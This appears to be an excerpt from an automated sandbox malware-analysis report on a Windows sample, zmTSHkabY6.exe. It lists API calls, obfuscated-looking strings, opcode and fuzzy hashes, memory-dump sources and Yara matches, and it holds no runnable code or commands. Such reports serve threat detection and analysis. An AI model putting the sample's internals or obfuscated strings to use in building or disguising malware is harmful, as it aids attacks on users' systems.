                                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                    • String ID:
                                                                    • API String ID: 3269011525-0
                                                                    • Opcode ID: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                                    • Instruction ID: 40c2fce60939aafa0776eae2e2369d18d4b8ec69fabe1ce25dfd7c9304a85116
                                                                    • Opcode Fuzzy Hash: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                                    • Instruction Fuzzy Hash: 67E092B1B40234BBCB112B90FE08ACD7F24EB0CB51B458072FD0666161C77D09228BDE
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E90CB6
                                                                      • Part of subcall function 00E91D29: HeapFree.KERNEL32(00000000,00000000,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?), ref: 00E91D3F
                                                                      • Part of subcall function 00E91D29: GetLastError.KERNEL32(?,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?,?), ref: 00E91D51
                                                                    • _free.LIBCMT ref: 00E90CC9
                                                                    • _free.LIBCMT ref: 00E90CDA
                                                                    • _free.LIBCMT ref: 00E90CEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                                    • Instruction ID: 973d7f9ccff552480a639f6d20c6960ab9a3f9bb8ad151951851a3125ff1e35c
                                                                    • Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                                    • Instruction Fuzzy Hash: A7E0EC79A133359A8A366F14BD41449FFA9EBD8B113862476F42022231C7320553DBCF
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00410A4F
                                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                    • _free.LIBCMT ref: 00410A62
                                                                    • _free.LIBCMT ref: 00410A73
                                                                    • _free.LIBCMT ref: 00410A84
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                                    • Instruction ID: 4f604ca58aada12d27b251242fa97a7c83cac521b99ee6611507b97af23f288b
                                                                    • Opcode Fuzzy Hash: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                                    • Instruction Fuzzy Hash: 46E0EC71B13360AA8632AF15BD41589FFA1EFD4B543C9003BF50812631D73909939BCE
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 0040F97D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__start
                                                                    • String ID: pow
                                                                    • API String ID: 3213639722-2276729525
                                                                    • Opcode ID: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                                    • Instruction ID: a4333340e488540e58a7cc811cab45b4078f0fd2139a3ee8952107b79a1fd4b1
                                                                    • Opcode Fuzzy Hash: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                                    • Instruction Fuzzy Hash: C15190B1B08601E6CB317718C9413EB6BD09B80701F64497BE495527E9EB3C8CDA9E8F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                    • API String ID: 0-808907004
                                                                    • Opcode ID: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                                    • Instruction ID: f5cbd8e96d27bdc1c45b24e0386b5d428b2a36cebf4c6be1d1b03eefb0cfeaba
                                                                    • Opcode Fuzzy Hash: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                                    • Instruction Fuzzy Hash: 15416D71A00218AFCF21EBA99C819AEBBF9EBC5310B901066F519F7211E7709A41CB94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                    • API String ID: 0-808907004
                                                                    • Opcode ID: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                                    • Instruction ID: ef1b21c86d4c641325268a2e562e5aacaa8476dc5588200f607cc18d3bf73bc2
                                                                    • Opcode Fuzzy Hash: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                                    • Instruction Fuzzy Hash: A8416471E00214ABCB219B999C85AEFBBF8EFD4350B1440ABF50497251D7B99EC1CB98
                                                                    APIs
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00E8AE86
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00E8AF3A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 3480331319-1018135373
                                                                    • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                    • Instruction ID: 0d3e3ba527afb51fede9bccf230295a5150f2a37de4b985ea2622551ed7ed367
                                                                    • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                    • Instruction Fuzzy Hash: FF41E470A002189BDF10EF68C884ADEBBF5BF45318F189066E91CBB352D7359E55CB92
                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 00E8B711
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                                    • Instruction ID: c01451688d0046c082db7cacc982c2c832204db7c6edd2d39bc2f964afae9c7f
                                                                    • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                                    • Instruction Fuzzy Hash: C1415872900209AFCF15EF98C881AEEBBB5FF48308F189169FA0DB7252D3359951DB51
                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0040B4AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                                    • Instruction ID: 67f376c023d9800a5206fdaf198d645220277734bcfb559d46511f35e7f4eabb
                                                                    • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                                    • Instruction Fuzzy Hash: 95415871900209AFDF15DF94CD81AAEBBB5EF48308F1480AAFA1576291D3399A50DB98
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                     • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                                    • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                                    • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                                    • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                                    APIs
                                                                      • Part of subcall function 00E893D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E893E2
                                                                      • Part of subcall function 00E893D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E8941F
                                                                    • __Init_thread_footer.LIBCMT ref: 00E81622
                                                                      • Part of subcall function 00E8938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E89397
                                                                      • Part of subcall function 00E8938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E893CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                    • String ID: FEKN$NE]D
                                                                    • API String ID: 4132704954-517842756
                                                                    • Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                                    • Instruction ID: f1b467e77b617a9ec32485f8195df8120495957f5052b3ca67556ad42c17e395
                                                                    • Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                                    • Instruction Fuzzy Hash: 60218C70B00645CFD720EF28E8467B837A0EF55304FA852A9D85C2B652E7B52586C7CD
                                                                    APIs
                                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                    • __Init_thread_footer.LIBCMT ref: 004013BB
                                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                    • String ID: FEKN$NE]D
                                                                    • API String ID: 2296764815-517842756
                                                                    • Opcode ID: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                                    • Instruction ID: bb411daeb84ba6cc8782813aab56c5dc80a7b29e6052d91cba9c4b608feb04e2
                                                                    • Opcode Fuzzy Hash: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                                    • Instruction Fuzzy Hash: 51215C30B00245CBD720CF29E846BA977B0FB95304F94427AD8542B7A3DBB92586C7DD
                                                                    APIs
                                                                      • Part of subcall function 00E893D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E893E2
                                                                      • Part of subcall function 00E893D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E8941F
                                                                    • __Init_thread_footer.LIBCMT ref: 00E879D5
                                                                      • Part of subcall function 00E8938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E89397
                                                                      • Part of subcall function 00E8938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E893CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                    • String ID: CD^O$_DC[
                                                                    • API String ID: 4132704954-3597986494
                                                                    • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                                    • Instruction ID: dfeffa4687f5bc53bd10059198556e597fa9e33559de966257bc77496d2f001a
                                                                    • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                                    • Instruction Fuzzy Hash: 5B01F970F00208CBC720FFA8BD4266D77F4EB04310F9592AAE51D67292E7759945CBC9
                                                                    APIs
                                                                      • Part of subcall function 00E893D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E893E2
                                                                      • Part of subcall function 00E893D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E8941F
                                                                    • __Init_thread_footer.LIBCMT ref: 00E87F95
                                                                      • Part of subcall function 00E8938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E89397
                                                                      • Part of subcall function 00E8938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E893CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                    • String ID: CD^O$_DC[
                                                                    • API String ID: 4132704954-3597986494
                                                                    • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                                    • Instruction ID: a794b1304716ad6d6dadcee9978dcc96e6721814e03bbe7f70ec96750f0fc94a
                                                                    • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                                    • Instruction Fuzzy Hash: BF01D670F04205CFC720FFA9BD429AD73A5EB44310BA81179E52D67242E77499458BD9
                                                                    APIs
                                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                    • __Init_thread_footer.LIBCMT ref: 00407D2E
                                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                    • String ID: CD^O$_DC[
                                                                    • API String ID: 2296764815-3597986494
                                                                    • Opcode ID: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                                    • Instruction ID: 8bf2ad3165393ed28199ca71651b1e02a490a28405ec2f0c6d2e7b73ba48d91c
                                                                    • Opcode Fuzzy Hash: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                                    • Instruction Fuzzy Hash: 1C012630F002059BC720EF6AAD0196973B4FB59300B84017AE5146B282E77899428BDE
                                                                    APIs
                                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                    • __Init_thread_footer.LIBCMT ref: 0040776E
                                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                    • String ID: CD^O$_DC[
                                                                    • API String ID: 2296764815-3597986494
                                                                    • Opcode ID: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                                    • Instruction ID: 44c7e97e152ec1ca5567fde67ff81d8d8e81e117548a1af78ec12ab7f1e6b2a3
                                                                    • Opcode Fuzzy Hash: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                                    • Instruction Fuzzy Hash: 64012670F002089BC720FF69AD41A5973B0E708350F80827EE5196B292EB786941CBCA
                                                                    APIs
                                                                      • Part of subcall function 00E893D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E893E2
                                                                      • Part of subcall function 00E893D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E8941F
                                                                    • __Init_thread_footer.LIBCMT ref: 00E87380
                                                                      • Part of subcall function 00E8938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E89397
                                                                      • Part of subcall function 00E8938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E893CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                    • String ID: DCDO$EDO*
                                                                    • API String ID: 4132704954-3480089779
                                                                    • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                                    • Instruction ID: 6c655730a581a06613cf295b884ffc62c2d25e3c51daf9e03c3b3cb5da957b8b
                                                                    • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                                    • Instruction Fuzzy Hash: E50186B0F01308DFC710EFA4E9825ACB7B0EB05314FA45179DA1D77391D734A9858B89
                                                                    APIs
                                                                      • Part of subcall function 00E893D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E893E2
                                                                      • Part of subcall function 00E893D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E8941F
                                                                    • __Init_thread_footer.LIBCMT ref: 00E87490
                                                                      • Part of subcall function 00E8938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E89397
                                                                      • Part of subcall function 00E8938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E893CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                    • String ID: DCDO$^]E*
                                                                    • API String ID: 4132704954-2708296792
                                                                    • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                                    • Instruction ID: 87714dc5058540edfb45f85b405dc986a9f4ca8856fab722e564a4da4eca6a85
                                                                    • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                                    • Instruction Fuzzy Hash: AE016D70F002089FC720FFA8E99266CBBF4EB04300F98417AD91D67792DB35A9158B99
                                                                    APIs
                                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                    • __Init_thread_footer.LIBCMT ref: 00407119
                                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                    • String ID: DCDO$EDO*
                                                                    • API String ID: 2296764815-3480089779
                                                                    • Opcode ID: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                                    • Instruction ID: 6e88f7cd3849569d85f07cd18ee47690fbb1a730dcdea08f10a2250dba35ba50
                                                                    • Opcode Fuzzy Hash: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                                    • Instruction Fuzzy Hash: 1F0186B0F01208AFC710DF55E98255DB7B0E705304F90457ADA15AB3D1DB386D95CB8D
                                                                    APIs
                                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                    • __Init_thread_footer.LIBCMT ref: 00407229
                                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                    • String ID: DCDO$^]E*
                                                                    • API String ID: 2296764815-2708296792
                                                                    • Opcode ID: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                                    • Instruction ID: 8efc7060af64cb8acb1af25de2c4b339d239c6825e953d18f5e204f1a235d67b
                                                                    • Opcode Fuzzy Hash: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                                    • Instruction Fuzzy Hash: 8F016D70F002089BC720EF68E94295DB7B0EB08304F9441BEE919A7396DB3969158BCE